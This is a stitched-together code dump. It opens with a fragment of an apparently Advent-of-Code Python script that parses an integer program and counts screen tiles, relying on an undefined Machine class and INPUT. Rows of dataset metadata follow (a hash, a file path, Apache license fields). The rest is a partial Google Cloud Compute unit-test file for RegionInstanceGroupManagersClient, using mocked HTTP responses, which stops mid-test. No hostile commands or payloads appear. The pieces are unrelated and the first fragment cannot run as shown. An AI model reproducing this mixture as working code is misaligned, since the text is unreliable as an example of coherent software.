97,73,74,91,80,67,38,25,54,90,97,81,52,43,55,12,85,78,71,42,76,50,16,61,81,82,61,30,48,67,15,38,93,1,12,20,18,82,15,17,78,60,94,48,18,7,10,26,33,70,46,79,8,93,29,53,32,15,79,83,1,84,23,30,95,55,36,47,20,93,56,41,5,73,42,68,8,14,41,61,43,34,40,17,52,23,61,27,51,27,77,34,14,3,42,20,97,13,33,16,96,43,42,11,67,9,94,50,45,19,48,59,2,16,38,3,97,59,70,21,86,95,24,34,49,60,43,4,94,44,6,42,21,51,6,39,1,76,17,15,75,43,39,14,61,93,49,45,38,92,60,58,49,17,8,57,77,31,48,43,17,8,89,37,17,19,23,9,17,28,44,2,83,61,84,83,43,8,80,71,56,15,16,17,46,14,85,92,75,58,71,83,7,13,92,27,39,56,21,24,20,31,65,34,4,37,9,95,21,53,93,19,78,88,12,46,76,77,37,16,5,43,13,68,1,67,98,13,55,70,57,77,13,92,168858"
# Steps to increment for each code
def debug(arg):
#pass
print(arg)
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
def draw_screen(data):
screen = {}
for triple in chunks(data,3):
screen[(triple[0],triple[1])] = triple[2]
debug(triple)
return screen
if __name__=='__main__':
# unittest.main()
program = [int(s) for s in INPUT.split(",")]
machine = Machine()
machine.memory = program.copy()
machine.counter = 0
machine.io = {'input': [], 'output': []}
while (machine.execute_instruction()):
pass
print(machine.io)
screen = draw_screen(machine.io['output'])
print(screen)
print(len([x for x in screen.values() if x == 2]))
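# --- Tiny illustration of the chunking step used by draw_screen above ---
# The sample values are made up and not part of the puzzle input.
sample_output = [1, 2, 3, 4, 5, 0]
sample_screen = draw_screen(sample_output)
# chunks(sample_output, 3) yields [1, 2, 3] and [4, 5, 0], so sample_screen is
# {(1, 2): 3, (4, 5): 0}; the final print above counts tiles with id 2.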
| 189.194444
| 5,943
| 0.626927
| 2,240
| 6,811
| 1.901339
| 0.107589
| 0.141348
| 0.175393
| 0.211317
| 0.2888
| 0.268138
| 0.227283
| 0.217187
| 0.209204
| 0.168819
| 0
| 0.568633
| 0.032007
| 6,811
| 35
| 5,944
| 194.6
| 0.077355
| 0.014388
| 0
| 0
| 0
| 0.037037
| 0.88874
| 0.884862
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0.037037
| 0.111111
| 0
| 0.259259
| 0.148148
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1a0b896401e260a155cf48b8d5d852fde0f7acce
| 167,946
|
py
|
Python
|
tests/unit/gapic/compute_v1/test_region_instance_group_managers.py
|
georgiyekkert/python-compute
|
d128efbb3bf10af9b41e55b20aaa8080b3221e77
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/compute_v1/test_region_instance_group_managers.py
|
georgiyekkert/python-compute
|
d128efbb3bf10af9b41e55b20aaa8080b3221e77
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/compute_v1/test_region_instance_group_managers.py
|
georgiyekkert/python-compute
|
d128efbb3bf10af9b41e55b20aaa8080b3221e77
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from requests import Response
from requests import Request
from requests.sessions import Session
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.compute_v1.services.region_instance_group_managers import (
RegionInstanceGroupManagersClient,
)
from google.cloud.compute_v1.services.region_instance_group_managers import pagers
from google.cloud.compute_v1.services.region_instance_group_managers import transports
from google.cloud.compute_v1.types import compute
from google.oauth2 import service_account
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert RegionInstanceGroupManagersClient._get_default_mtls_endpoint(None) is None
assert (
RegionInstanceGroupManagersClient._get_default_mtls_endpoint(api_endpoint)
== api_mtls_endpoint
)
assert (
RegionInstanceGroupManagersClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
RegionInstanceGroupManagersClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
RegionInstanceGroupManagersClient._get_default_mtls_endpoint(
sandbox_mtls_endpoint
)
== sandbox_mtls_endpoint
)
assert (
RegionInstanceGroupManagersClient._get_default_mtls_endpoint(non_googleapi)
== non_googleapi
)
@pytest.mark.parametrize("client_class", [RegionInstanceGroupManagersClient,])
def test_region_instance_group_managers_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "compute.googleapis.com:443"
@pytest.mark.parametrize(
"transport_class,transport_name",
[(transports.RegionInstanceGroupManagersRestTransport, "rest"),],
)
def test_region_instance_group_managers_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [RegionInstanceGroupManagersClient,])
def test_region_instance_group_managers_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "compute.googleapis.com:443"
def test_region_instance_group_managers_client_get_transport_class():
transport = RegionInstanceGroupManagersClient.get_transport_class()
available_transports = [
transports.RegionInstanceGroupManagersRestTransport,
]
assert transport in available_transports
transport = RegionInstanceGroupManagersClient.get_transport_class("rest")
assert transport == transports.RegionInstanceGroupManagersRestTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(
RegionInstanceGroupManagersClient,
transports.RegionInstanceGroupManagersRestTransport,
"rest",
),
],
)
@mock.patch.object(
RegionInstanceGroupManagersClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(RegionInstanceGroupManagersClient),
)
def test_region_instance_group_managers_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(
RegionInstanceGroupManagersClient, "get_transport_class"
) as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(
RegionInstanceGroupManagersClient, "get_transport_class"
) as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
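# Illustrative sketch (not collected by pytest): the ClientOptions fields the
# test above exercises. The endpoint and quota project names are hypothetical.
def _example_client_options():
    options = client_options.ClientOptions(
        api_endpoint="compute.example.com",  # hypothetical custom endpoint
        quota_project_id="my-billing-project",  # hypothetical quota project
    )
    client = RegionInstanceGroupManagersClient(
        credentials=ga_credentials.AnonymousCredentials(), client_options=options,
    )
    # The override is forwarded to the transport as its host.
    assert "compute.example.com" in client.transport._host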
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(
RegionInstanceGroupManagersClient,
transports.RegionInstanceGroupManagersRestTransport,
"rest",
"true",
),
(
RegionInstanceGroupManagersClient,
transports.RegionInstanceGroupManagersRestTransport,
"rest",
"false",
),
],
)
@mock.patch.object(
RegionInstanceGroupManagersClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(RegionInstanceGroupManagersClient),
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_region_instance_group_managers_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
    # This tests the endpoint autoswitch behavior. The endpoint is switched to the
    # default mTLS endpoint if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and a
    # client certificate exists.
    # Check the case client_cert_source is provided. Whether the client cert is
    # used depends on the GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
    # Check the case ADC client cert is provided. Whether the client cert is used
    # depends on the GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
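# Illustrative sketch (not collected by pytest): the two environment variables
# the test above exercises, with their supported values.
def _example_mtls_env_vars():
    # GOOGLE_API_USE_CLIENT_CERTIFICATE: "true" or "false" (default "false").
    # GOOGLE_API_USE_MTLS_ENDPOINT: "always", "never", or "auto" (default "auto").
    with mock.patch.dict(
        os.environ,
        {
            "GOOGLE_API_USE_CLIENT_CERTIFICATE": "false",
            "GOOGLE_API_USE_MTLS_ENDPOINT": "never",
        },
    ):
        client = RegionInstanceGroupManagersClient(
            credentials=ga_credentials.AnonymousCredentials()
        )
        # With mTLS disabled, the client targets the regular endpoint.
        assert "mtls" not in client.transport._host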
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(
RegionInstanceGroupManagersClient,
transports.RegionInstanceGroupManagersRestTransport,
"rest",
),
],
)
def test_region_instance_group_managers_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(
RegionInstanceGroupManagersClient,
transports.RegionInstanceGroupManagersRestTransport,
"rest",
),
],
)
def test_region_instance_group_managers_client_client_options_credentials_file(
client_class, transport_class, transport_name
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
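# Illustrative sketch (not collected by pytest): scopes and a credentials file
# can be combined in one ClientOptions. The scope and filename are hypothetical;
# the options object is only built, not used, so no file is read here.
def _example_scopes_and_credentials_file():
    return client_options.ClientOptions(
        scopes=["https://www.googleapis.com/auth/cloud-platform"],
        credentials_file="credentials.json",
    )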
def test_abandon_instances_rest(
transport: str = "rest",
request_type=compute.AbandonInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_abandon_instances_request_resource"
] = compute.RegionInstanceGroupManagersAbandonInstancesRequest(
instances=["instances_value"]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.abandon_instances(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_abandon_instances_rest_bad_request(
transport: str = "rest",
request_type=compute.AbandonInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_abandon_instances_request_resource"
] = compute.RegionInstanceGroupManagersAbandonInstancesRequest(
instances=["instances_value"]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.abandon_instances(request)
def test_abandon_instances_rest_from_dict():
test_abandon_instances_rest(request_type=dict)
def test_abandon_instances_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_abandon_instances_request_resource=compute.RegionInstanceGroupManagersAbandonInstancesRequest(
instances=["instances_value"]
),
)
mock_args.update(sample_request)
client.abandon_instances(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/abandonInstances"
% client.transport._host,
args[1],
)
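# Illustrative sketch (not collected by pytest): path_template.validate treats
# each {field} in the template as a single-segment wildcard, which is how the
# flattened tests check the final request URL. Host and values are arbitrary.
def _example_path_template_validate():
    template = "https://host/compute/v1/projects/{project}/regions/{region}"
    assert path_template.validate(
        template, "https://host/compute/v1/projects/sample1/regions/sample2"
    )
    assert not path_template.validate(
        template, "https://host/compute/v1/projects/sample1"
    )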
def test_abandon_instances_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.abandon_instances(
compute.AbandonInstancesRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_abandon_instances_request_resource=compute.RegionInstanceGroupManagersAbandonInstancesRequest(
instances=["instances_value"]
),
)
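# Illustrative sketch (not collected by pytest): every method accepts either a
# fully-formed request object or flattened keyword arguments, but never both at
# once, which is exactly what the _flattened_error tests verify. The field
# values below are the same placeholders the tests use.
def _example_call_styles(client):
    # Style 1: pass a request object.
    client.abandon_instances(
        compute.AbandonInstancesRegionInstanceGroupManagerRequest(
            project="project_value",
            region="region_value",
            instance_group_manager="instance_group_manager_value",
        )
    )
    # Style 2: pass the same fields as flattened keyword arguments.
    client.abandon_instances(
        project="project_value",
        region="region_value",
        instance_group_manager="instance_group_manager_value",
    )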
def test_apply_updates_to_instances_rest(
transport: str = "rest",
request_type=compute.ApplyUpdatesToInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_apply_updates_request_resource"
] = compute.RegionInstanceGroupManagersApplyUpdatesRequest(all_instances=True)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.apply_updates_to_instances(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_apply_updates_to_instances_rest_bad_request(
transport: str = "rest",
request_type=compute.ApplyUpdatesToInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_apply_updates_request_resource"
] = compute.RegionInstanceGroupManagersApplyUpdatesRequest(all_instances=True)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.apply_updates_to_instances(request)
def test_apply_updates_to_instances_rest_from_dict():
test_apply_updates_to_instances_rest(request_type=dict)
def test_apply_updates_to_instances_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_apply_updates_request_resource=compute.RegionInstanceGroupManagersApplyUpdatesRequest(
all_instances=True
),
)
mock_args.update(sample_request)
client.apply_updates_to_instances(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/applyUpdatesToInstances"
% client.transport._host,
args[1],
)
def test_apply_updates_to_instances_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.apply_updates_to_instances(
compute.ApplyUpdatesToInstancesRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_apply_updates_request_resource=compute.RegionInstanceGroupManagersApplyUpdatesRequest(
all_instances=True
),
)
def test_create_instances_rest(
transport: str = "rest",
request_type=compute.CreateInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_create_instances_request_resource"
] = compute.RegionInstanceGroupManagersCreateInstancesRequest(
instances=[compute.PerInstanceConfig(fingerprint="fingerprint_value")]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.create_instances(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_create_instances_rest_bad_request(
transport: str = "rest",
request_type=compute.CreateInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_create_instances_request_resource"
] = compute.RegionInstanceGroupManagersCreateInstancesRequest(
instances=[compute.PerInstanceConfig(fingerprint="fingerprint_value")]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
